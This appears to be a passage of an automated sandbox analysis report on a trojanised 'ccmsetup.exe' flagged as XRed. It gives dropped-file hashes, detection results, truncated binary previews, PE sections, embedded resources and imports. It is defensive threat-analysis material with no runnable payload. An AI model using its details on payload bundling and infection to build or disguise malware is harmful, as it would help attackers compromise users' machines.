                                                                                        SHA1:0A427A132A1439B024C386F635581F40BD697292
                                                                                        SHA-256:362667237C33EDC5CCE348A65F4C82870DB1F2ECD83748BC9F0696A7E154D5D6
                                                                                        SHA-512:B8B0D2EC798881BD987B7685091A61A17EE5DAA49C40A49D6962D17CC6B67F0FFE545F00CAD0CD72637FA71901D81789CBAA23486CA9BA614A0728A6A293462F
                                                                                        Malicious:false
                                                                                        Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="0510o3BM8FCATr_1Uj4R6g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                        C:\Users\user\AppData\Local\Temp\~$aOkCiDht.xlsm

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):165
                                                                                        Entropy (8bit):1.5231029153786204
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:sYp5lFltt:sYp5Nv
                                                                                        MD5:B77267835A6BEAC785C351BDE8E1A61C
                                                                                        SHA1:FABD93A92989535D43233E3DB9C6579D8174740E
                                                                                        SHA-256:3B222E766EADC8BC9A8A90AC32FA591F313545B7E8C5D481D378AE307FA798C3
                                                                                        SHA-512:FFFCBA958E9BD56F284DA19592F124C48B013FCDA2FBE65B3EB38BB644C2B0C978E6DAE99EF213B054813C7212E119B09236A6FFF342D32E52C84DD26DE1E033
                                                                                        Malicious:false
                                                                                        Preview:.user ..a.l.f.o.n.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                        C:\Users\user\AppData\Local\Temp\~DF26ADD4038D9CE1A6.TMP

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                        Category:dropped
                                                                                        Size (bytes):32768
                                                                                        Entropy (8bit):3.746897789531007
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:QuY+pHkfpPr76TWiu0FPZK3rcd5kM7f+ihdCF3EiRcx+NSt0ckBCecUSaFUH:ZZpEhSTWi/ekfzaVNg0c4gU
                                                                                        MD5:7426F318A20A187D88A6EC88BBB53BAF
                                                                                        SHA1:4F2C80834F4B5C9FCF6F4B1D4BF82C9F7CCB92CA
                                                                                        SHA-256:9AF85C0291203D0F536AA3F4CB7D5FBD4554B331BF4254A6ECD99FE419217830
                                                                                        SHA-512:EC7BAA93D8E3ACC738883BAA5AEDF22137C26330179164C8FCE7D7F578C552119F58573D941B7BEFC4E6848C0ADEEF358B929A733867923EE31CD2717BE20B80
                                                                                        Malicious:false
                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\Desktop\._cache_ccmsetup.exe

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\ccmsetup.exe
                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):4102192
                                                                                        Entropy (8bit):5.263364825092673
                                                                                        Encrypted:false
                                                                                        SSDEEP:49152:ymrE906DDnrvpjFGO+LFPPYK6Ii1+0UfWUWveO1b9Uqi1dP80qt/wTywEFEBE:ymrE906DDnjpREFgBIi95
                                                                                        MD5:169E238A8E29445C319F934362361D28
                                                                                        SHA1:824E61DE77DA1E91B4BBB09C92E6908E80D4143D
                                                                                        SHA-256:63FB838C9604C2AF8D8BC17A48D2D745F389AD984CC2AB5E0765D5B27C91A710
                                                                                        SHA-512:A7FCAA91C5DE184956605D403E1881B0F62076B01C0C6D03B5DBD42E9B8CA704AE59362B3D46F966C213E7B1E915DA95D681DB9CB6063923A50B76A55427F2BA
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ t/.A.|.A.|.A.|.8.|.A.|.#.}.A.|...|.A.|...|{A.|...|.A.|.#.}.A.|.#.}.A.|.A.|.C.|.8.|[A.|.8.|.A.|.8.|.A.|Rich.A.|................PE..L......\......................+......L............@...........................>.....Q.?...@..................................;.......<. ............Z>.0>....<.D... ...8............................J8.@.....................;.@....................text...e........................... ..`.rdata....(.......).................@..@.data...@.....;.......;.............@....rsrc... .....<.......<.............@..@.reloc..D.....<.......<.............@..B........................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\Documents\BJZFPPWAPT\ZGGKNSUKOP.xlsm

                                                                                        Download File
                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        File Type:Microsoft Excel 2007+
                                                                                        Category:dropped
                                                                                        Size (bytes):18387
                                                                                        Entropy (8bit):7.523057953697544
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                                        MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                                        SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                                        SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                                                        SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                                        Malicious:false
                                                                                        Preview:PK..........!...5Qr...?.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-..@.5.....(..8...-.[.g.......M^..s.5.4.I..P;..!....r....}._.G.`....Y....M.7....&.m1cU..I.T.....`.t...^.Bx..r..~0x....6...`....reb2m.s.$.%...-*c.{...dT.m.kL]Yj.|..Yp..".G.......r...).#b.=.QN'...i..w.s..$3..)).....2wn..ls.F..X.D^K.......Cj.sx..E..n._ ....pjUS.9.....j..L...>".....w.... ....l{.sd*...G.....wC.F... D..1<..=...z.As.]...#l..........PK..........!..U0#....L......._rels/.rels ...(...............

                                                                                        C:\Users\user\Documents\BJZFPPWAPT\~$ZGGKNSUKOP.xlsx

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):165
                                                                                        Entropy (8bit):1.5231029153786204
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:sYp5lFltt:sYp5Nv
                                                                                        MD5:B77267835A6BEAC785C351BDE8E1A61C
                                                                                        SHA1:FABD93A92989535D43233E3DB9C6579D8174740E
                                                                                        SHA-256:3B222E766EADC8BC9A8A90AC32FA591F313545B7E8C5D481D378AE307FA798C3
                                                                                        SHA-512:FFFCBA958E9BD56F284DA19592F124C48B013FCDA2FBE65B3EB38BB644C2B0C978E6DAE99EF213B054813C7212E119B09236A6FFF342D32E52C84DD26DE1E033
                                                                                        Malicious:false
                                                                                        Preview:.user ..a.l.f.o.n.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                        C:\Users\user\Documents\BJZFPPWAPT\~$cache1

                                                                                        Download File
                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):771584
                                                                                        Entropy (8bit):6.645638500999874
                                                                                        Encrypted:false
                                                                                        SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9I+r:ansJ39LyjbJkQFMhmC+6GD9d
                                                                                        MD5:020E869138373254D25D50294CEB45AF
                                                                                        SHA1:FA802F233890198365C3273DEF15399F074610C5
                                                                                        SHA-256:3EFD789B8DDF86A424BB238DACC61F92D1665094CA892543359D6F0A33FC87A7
                                                                                        SHA-512:EE4715D5E56FD79D93447FF2802E0676B21CC8A9744F874B16B27B25BC45B796DB46CC2DA05B7FCC27CE53FCD0A3A136308B6AC02E77513F82F822D8BCF4612D
                                                                                        Malicious:true
                                                                                        Yara Hits:
                                                                                        • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\Users\user\Documents\BJZFPPWAPT\~$cache1, Author: Joe Security
                                                                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\Documents\BJZFPPWAPT\~$cache1, Author: Joe Security
                                                                                        Antivirus:
                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                        • Antivirus: ReversingLabs, Detection: 92%
                                                                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................&....................@.......................... ...................@..............................B*...........................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                                                                        C:\Windows\appcompat\Programs\Amcache.hve

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:MS Windows registry file, NT/2000 or above
                                                                                        Category:dropped
                                                                                        Size (bytes):1835008
                                                                                        Entropy (8bit):4.421746738941615
                                                                                        Encrypted:false
                                                                                        SSDEEP:6144:QSvfpi6ceLP/9skLmb0OTMWSPHaJG8nAgeMZMMhA2fX4WABlEnNT0uhiTw:7vloTMW+EZMM6DFyp03w
                                                                                        MD5:EDD45342B59CEDA59EA59B7851B22589
                                                                                        SHA1:0355917DB8BFA8F06D99E87230778D62567CA030
                                                                                        SHA-256:CD2A1842941EA248A5AFB8EA34E38A75A950ED8DC39C4C22E0680CC9D7BA3322
                                                                                        SHA-512:CCB329010AA0BF6F7F9C6F1CAF83CB0BE5976AEF4339BCE196BD4A221AA7C2E6C55846CBD4930D02929C61B2ED60083BCCCB9EA86F8FAD17D20C6EAE64F9ECD3
                                                                                        Malicious:false
                                                                                        Preview:regf@...@....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..B._G...............................................................................................................................................................................................................................................................................................................................................oU.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Windows\ccmsetup\Logs\ccmsetup.log

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\._cache_ccmsetup.exe
                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):10245
                                                                                        Entropy (8bit):5.330050068135235
                                                                                        Encrypted:false
                                                                                        SSDEEP:96:XyyJdgVSdL2ML28kO9cAXycEnLHaHHPC/yCPMQtB01Gkv6BCHyPyHArr+VicqRBz:B3+6nP7gNtKWuL8dJrD
                                                                                        MD5:C4708ACF08FF3B2B7B52C91F03214115
                                                                                        SHA1:A297BD6944E13ADDC0132F76C464918E30369F00
                                                                                        SHA-256:AD8F4852729902E2590BB6B12BD76175E5CD20720750C2A9F92B91168B956D4A
                                                                                        SHA-512:4706DE8CFFDBA08530E40C56A7A98F9B646BD5EB89AB95F55D037A15C0EA121E72E28CB1225167C221F388267F981627F17CA8FCCB39088801A66C955F10416B
                                                                                        Malicious:false
                                                                                        Preview:.<![LOG[==========[ ccmsetup started in process 3128 ]==========]LOG]!><time="16:49:57.805+300" date="12-05-2024" component="ccmsetup" context="" type="1" thread="1560" file="ccmsetup.cpp:10478">..<![LOG[Running on platform X64]LOG]!><time="16:49:57.805+300" date="12-05-2024" component="ccmsetup" context="" type="1" thread="1560" file="util.cpp:1704">..<![LOG[Launch from folder C:\Users\user\Desktop\]LOG]!><time="16:49:57.805+300" date="12-05-2024" component="ccmsetup" context="" type="1" thread="1560" file="ccmsetup.cpp:688">..<![LOG[CcmSetup version: 5.0.8790.1025]LOG]!><time="16:49:57.805+300" date="12-05-2024" component="ccmsetup" context="" type="1" thread="1560" file="ccmsetup.cpp:694">..<![LOG[Folder 'Microsoft\Microsoft\Configuration Manager' not found. Task does not exist.]LOG]!><time="16:49:57.821+300" date="12-05-2024" component="ccmsetup" context="" type="0" thread="1560" file="wintask.cpp:709">..<![LOG[Folder 'Microsoft\Microsoft\Configuration Manager' not found. Task

                                                                                        Static File Info

                                                                                        General

                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                        Entropy (8bit):5.56388575934556
                                                                                        TrID:
                                                                                        • Win32 Executable (generic) a (10002005/4) 93.58%
                                                                                        • Win32 Executable Borland Delphi 7 (665061/41) 6.22%
                                                                                        • Win32 Executable Delphi generic (14689/80) 0.14%
                                                                                        • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                        File name:ccmsetup.exe
                                                                                        File size:4'873'728 bytes
                                                                                        MD5:823444545911fd17e953437b7c712f2f
                                                                                        SHA1:6d1c0b1c3caade86c13196a0763538d0ee29322e
                                                                                        SHA256:845b6f57d33b26dd409ae897707e4a5141991df780983593965983d95c06c67d
                                                                                        SHA512:51692b5d995081627364345ff73d2f16c573a1cdbccf6130e0ee76417decdf2b57bf09d8c242c709642e9c40d2482e6ccd6ecda99c932b10fac1d8ac44d3367b
                                                                                        SSDEEP:49152:gnsHyjtk2MYC5GDfmrE906DDnrvpjFGO+LFPPYK6Ii1+0UfWUWveO1b9Uqi1dP8B:gnsmtk2aWmrE906DDnjpREFgBIi9/
                                                                                        TLSH:FC366041B6ED6244F7B72EB4ADFEA1520D7FB9A1AC74C71E8110894E2432E55CCB4F22
                                                                                        File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                                        File Icon

                                                                                        Icon Hash:08286c76665c1808

                                                                                        Static PE Info

                                                                                        General

                                                                                        Entrypoint:0x49ab80
                                                                                        Entrypoint Section:CODE
                                                                                        Digitally signed:false
                                                                                        Imagebase:0x400000
                                                                                        Subsystem:windows gui
                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                        DLL Characteristics:
                                                                                        Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                        TLS Callbacks:
                                                                                        CLR (.Net) Version:
                                                                                        OS Version Major:4
                                                                                        OS Version Minor:0
                                                                                        File Version Major:4
                                                                                        File Version Minor:0
                                                                                        Subsystem Version Major:4
                                                                                        Subsystem Version Minor:0
                                                                                        Import Hash:332f7ce65ead0adfb3d35147033aabe9

                                                                                        Entrypoint Preview

                                                                                        Instruction
                                                                                        push ebp
                                                                                        mov ebp, esp
                                                                                        add esp, FFFFFFF0h
                                                                                        mov eax, 0049A778h
                                                                                        call 00007F96F0ACB68Dh
                                                                                        mov eax, dword ptr [0049DBCCh]
                                                                                        mov eax, dword ptr [eax]
                                                                                        call 00007F96F0B1EFD5h
                                                                                        mov eax, dword ptr [0049DBCCh]
                                                                                        mov eax, dword ptr [eax]
                                                                                        mov edx, 0049ABE0h
                                                                                        call 00007F96F0B1EBD4h
                                                                                        mov ecx, dword ptr [0049DBDCh]
                                                                                        mov eax, dword ptr [0049DBCCh]
                                                                                        mov eax, dword ptr [eax]
                                                                                        mov edx, dword ptr [00496590h]
                                                                                        call 00007F96F0B1EFC4h
                                                                                        mov eax, dword ptr [0049DBCCh]
                                                                                        mov eax, dword ptr [eax]
                                                                                        call 00007F96F0B1F038h
                                                                                        call 00007F96F0AC916Bh
                                                                                        add byte ptr [eax], al

                                                                                        Data Directories

                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xa00000x2a42.idata
                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xb00000x3fb560.rsrc
                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xa50000xa980.reloc
                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0xa40180x21.rdata
                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0xa40000x18.rdata
                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                        Sections

                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                        CODE0x10000x99bec0x99c0033fbe30e8a64654287edd1bf05ae7c8cFalse0.5141641260162602data6.572957870355296IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                        DATA0x9b0000x2e540x30001f5e19e7d20c1d128443d738ac7bc610False0.453125data4.854620797809023IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                        BSS0x9e0000x11e50x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                        .idata0xa00000x2a420x2c0021ff53180b390dc06e3a1adf0e57a073False0.3537819602272727data4.919333216027082IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                        .tls0xa30000x100x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                        .rdata0xa40000x390x200a92cf494c617731a527994013429ad97False0.119140625MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "J"0.7846201577093705IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                        .reloc0xa50000xa9800xaa00dcd1b1c3f3d28d444920211170d1e8e6False0.5899816176470588data6.674124985579511IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                        .rsrc0xb00000x3fb5600x3fb600ca371d571491289142606cd71283d285unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

                                                                                        Resources

                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                        RT_CURSOR0xb0dc80x134Targa image data - Map 64 x 65536 x 1 +32 "\001"0.38636363636363635
                                                                                        RT_CURSOR0xb0efc0x134data0.4642857142857143
                                                                                        RT_CURSOR0xb10300x134data0.4805194805194805
                                                                                        RT_CURSOR0xb11640x134data0.38311688311688313
                                                                                        RT_CURSOR0xb12980x134data0.36038961038961037
                                                                                        RT_CURSOR0xb13cc0x134data0.4090909090909091
                                                                                        RT_CURSOR0xb15000x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"0.4967532467532468
                                                                                        RT_BITMAP0xb16340x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.43103448275862066
                                                                                        RT_BITMAP0xb18040x1e4Device independent bitmap graphic, 36 x 19 x 4, image size 3800.46487603305785125
                                                                                        RT_BITMAP0xb19e80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.43103448275862066
                                                                                        RT_BITMAP0xb1bb80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.39870689655172414
                                                                                        RT_BITMAP0xb1d880x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.4245689655172414
                                                                                        RT_BITMAP0xb1f580x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.5021551724137931
                                                                                        RT_BITMAP0xb21280x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.5064655172413793
                                                                                        RT_BITMAP0xb22f80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.39655172413793105
                                                                                        RT_BITMAP0xb24c80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.5344827586206896
                                                                                        RT_BITMAP0xb26980x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.39655172413793105
                                                                                        RT_BITMAP0xb28680xe8Device independent bitmap graphic, 16 x 16 x 4, image size 1280.4870689655172414
                                                                                        RT_ICON0xb29500x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 40960.7431988742964353
                                                                                        RT_ICON0xb39f80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 8192TurkishTurkey0.2101313320825516
                                                                                        RT_DIALOG0xb4aa00x52data0.7682926829268293
                                                                                        RT_STRING0xb4af40x358data0.3796728971962617
                                                                                        RT_STRING0xb4e4c0x428data0.37406015037593987
                                                                                        RT_STRING0xb52740x3a4data0.40879828326180256
                                                                                        RT_STRING0xb56180x3bcdata0.33472803347280333
                                                                                        RT_STRING0xb59d40x2d4data0.4654696132596685
                                                                                        RT_STRING0xb5ca80x334data0.42804878048780487
                                                                                        RT_STRING0xb5fdc0x42cdata0.42602996254681647
                                                                                        RT_STRING0xb64080x1f0data0.4213709677419355
                                                                                        RT_STRING0xb65f80x1c0data0.44419642857142855
                                                                                        RT_STRING0xb67b80xdcdata0.6
                                                                                        RT_STRING0xb68940x320data0.45125
                                                                                        RT_STRING0xb6bb40xd8data0.5879629629629629
                                                                                        RT_STRING0xb6c8c0x118data0.5678571428571428
                                                                                        RT_STRING0xb6da40x268data0.4707792207792208
                                                                                        RT_STRING0xb700c0x3f8data0.37598425196850394
                                                                                        RT_STRING0xb74040x378data0.41103603603603606
                                                                                        RT_STRING0xb777c0x380data0.35379464285714285
                                                                                        RT_STRING0xb7afc0x374data0.4061085972850679
                                                                                        RT_STRING0xb7e700xe0data0.5535714285714286
                                                                                        RT_STRING0xb7f500xbcdata0.526595744680851
                                                                                        RT_STRING0xb800c0x368data0.40940366972477066
                                                                                        RT_STRING0xb83740x3fcdata0.34901960784313724
                                                                                        RT_STRING0xb87700x2fcdata0.36649214659685864
                                                                                        RT_STRING0xb8a6c0x354data0.31572769953051644
                                                                                        RT_RCDATA0xb8dc00x44data0.8676470588235294
                                                                                        RT_RCDATA0xb8e040x10data1.5
                                                                                        RT_RCDATA0xb8e140x3e9830PE32 executable (GUI) Intel 80386, for MS Windows0.5238924026489258
                                                                                        RT_RCDATA0x4a26440x3ASCII text, with no line terminatorsTurkishTurkey3.6666666666666665
                                                                                        RT_RCDATA0x4a26480x3c00PE32 executable (DLL) (GUI) Intel 80386, for MS WindowsTurkishTurkey0.54296875
                                                                                        RT_RCDATA0x4a62480x64cdata0.5998759305210918
                                                                                        RT_RCDATA0x4a68940x153Delphi compiled form 'TFormVir'0.7522123893805309
                                                                                        RT_RCDATA0x4a69e80x47d3Microsoft Excel 2007+TurkishTurkey0.8675150921846957
                                                                                        RT_GROUP_CURSOR0x4ab1bc0x14Lotus unknown worksheet or configuration, revision 0x11.25
                                                                                        RT_GROUP_CURSOR0x4ab1d00x14Lotus unknown worksheet or configuration, revision 0x11.25
                                                                                        RT_GROUP_CURSOR0x4ab1e40x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                        RT_GROUP_CURSOR0x4ab1f80x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                        RT_GROUP_CURSOR0x4ab20c0x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                        RT_GROUP_CURSOR0x4ab2200x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                        RT_GROUP_CURSOR0x4ab2340x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                        RT_GROUP_ICON0x4ab2480x14dataTurkishTurkey1.1
                                                                                        RT_VERSION0x4ab25c0x304dataTurkishTurkey0.42875647668393785

                                                                                        Imports

                                                                                        DLLImport
                                                                                        kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, SetCurrentDirectoryA, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetCurrentDirectoryA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, ExitThread, CreateThread, WriteFile, UnhandledExceptionFilter, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetFileType, CreateFileA, CloseHandle
                                                                                        user32.dllGetKeyboardType, LoadStringA, MessageBoxA, CharNextA
                                                                                        advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                                                        oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                                                        kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                                                                                        advapi32.dllRegSetValueExA, RegQueryValueExA, RegOpenKeyExA, RegNotifyChangeKeyValue, RegFlushKey, RegDeleteValueA, RegCreateKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA, GetUserNameA, AdjustTokenPrivileges
                                                                                        kernel32.dlllstrcpyA, WritePrivateProfileStringA, WriteFile, WaitForSingleObject, WaitForMultipleObjects, VirtualQuery, VirtualAlloc, UpdateResourceA, UnmapViewOfFile, TerminateProcess, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetFileAttributesA, SetEvent, SetErrorMode, SetEndOfFile, ResumeThread, ResetEvent, RemoveDirectoryA, ReadFile, OpenProcess, OpenMutexA, MultiByteToWideChar, MulDiv, MoveFileA, MapViewOfFile, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTimeZoneInformation, GetTickCount, GetThreadLocale, GetTempPathA, GetTempFileNameA, GetSystemInfo, GetSystemDirectoryA, GetStringTypeExA, GetStdHandle, GetProcAddress, GetPrivateProfileStringA, GetModuleHandleA, GetModuleFileNameA, GetLogicalDrives, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeThread, GetDriveTypeA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCurrentProcess, GetComputerNameA, GetCPInfo, GetACP, FreeResource, InterlockedIncrement, InterlockedExchange, InterlockedDecrement, FreeLibrary, FormatMessageA, FindResourceA, FindNextFileA, FindFirstFileA, FindClose, FileTimeToLocalFileTime, FileTimeToDosDateTime, EnumCalendarInfoA, EnterCriticalSection, EndUpdateResourceA, DeleteFileA, DeleteCriticalSection, CreateThread, CreateProcessA, CreatePipe, CreateMutexA, CreateFileMappingA, CreateFileA, CreateEventA, CreateDirectoryA, CopyFileA, CompareStringA, CloseHandle, BeginUpdateResourceA
                                                                                        version.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
